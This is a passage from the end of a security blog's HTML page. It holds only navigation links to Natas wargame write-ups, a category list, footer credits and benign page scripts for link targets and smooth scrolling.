        <p><a href="/2021/05/28/natas15-16/">Natas Level 15 → Level 16</a> <i class="fa fa-arrow-right"></i></p>
        
    </div>
</div>

        
        
        

    </div>
    <button class="anchor"><i class="fa fa-anchor"></i></button>
    <div class="right">
        <div class="wrap">
            <div class="side">
                <div>
                    <i class="fa fa-pencil-square-o" aria-hidden="true"></i>
                    Recent Posts
                </div>
                <ul class="content-ul" recent>
                    
                        <li><a href="/2021/05/31/natas26-27/">Natas Level 26 → Level 27</a></li>
                    
                        <li><a href="/2021/05/31/natas25-26/">Natas Level 25 → Level 26</a></li>
                    
                        <li><a href="/2021/05/30/natas24-25/">Natas Level 24 → Level 25</a></li>
                    
                        <li><a href="/2021/05/30/natas23-24/">Natas Level 23 → Level 24</a></li>
                    
                        <li><a href="/2021/05/30/natas22-23/">Natas Level 22 → Level 23</a></li>
                    
                </ul>
            </div>

            <!-- Content -->
            <div class="side ">
                <div>
                    <i class="fa fa-th-list"></i>
                    Categories
                </div>
                <ul class="content-ul" cate>
                    
                    <li>
                        <a href="/category/#reverse-engineering" class="categories-list-item" cate="reverse-engineering">
                            <span class="name">
                                reverse-engineering
                            </span>
                            <span class="badge">13</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#x86-64" class="categories-list-item" cate="x86-64">
                            <span class="name">
                                x86-64
                            </span>
                            <span class="badge">8</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#ctf" class="categories-list-item" cate="ctf">
                            <span class="name">
                                ctf
                            </span>
                            <span class="badge">68</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#wargames" class="categories-list-item" cate="wargames">
                            <span class="name">
                                wargames
                            </span>
                            <span class="badge">63</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#linux" class="categories-list-item" cate="linux">
                            <span class="name">
                                linux
                            </span>
                            <span class="badge">35</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#web-security" class="categories-list-item" cate="web-security">
                            <span class="name">
                                web-security
                            </span>
                            <span class="badge">28</span>
                        </a>
                    </li>
                    
                </ul>
            </div>

            <!-- Tag Cloud -->
            
        </div>
    </div>
</div>
<script>
/**
 * target _blank
 */
(function() {
    var aTags = document.querySelectorAll('article a:not([id])')
    for (var i = 0; i < aTags.length; i++) {
        aTags[i].setAttribute('target', '_blank')
    }
}());
</script>
<!-- <script src="/assets/js/pageContent.js " charset="utf-8"></script> -->


    <footer class="site-footer">


    <div class="wrapper">

        <p class="description">
            
        </p>
        <p class="contact">
            Find me on: 
            <a href="https://github.com/caminek" title="GitHub"><i class="fa fa-github" aria-hidden="true"></i></a> 
             
        </p>
        <p class="power">
            <span>
                Site powered by <a href="https://jekyllrb.com/">Jekyll</a> & <a href="https://pages.github.com/">Github Pages</a>.
            </span>
            <span>
                Theme designed by <a href="https://github.com/Gaohaoyang">HyG</a>, and modified by <a href="https://github.com/caminek">caminek</a>.
            </span>
        </p>
    </div>
</footer>

    <div class="back-to-top">
    <a href="#top" data-scroll>
        <i class="fa fa-arrow-up" aria-hidden="true"></i>
    </a>
</div>

    <!-- <script src=" /assets/js/main.js " charset="utf-8"></script>
    <script src=" /assets/js/smooth-scroll.min.js " charset="utf-8"></script> -->
    <script src=" /assets/js/all.js " charset="utf-8"></script>
    <script type="text/javascript">
      smoothScroll.init({
        speed: 500, // Integer. How fast to complete the scroll in milliseconds
        easing: 'easeInOutCubic', // Easing pattern to use
        offset: 20, // Integer. How far to offset the scrolling anchor location in pixels
      });
    </script>
    <!-- <script src=" /assets/js/scroll.min.js " charset="utf-8"></script> -->
  </body>

</html>
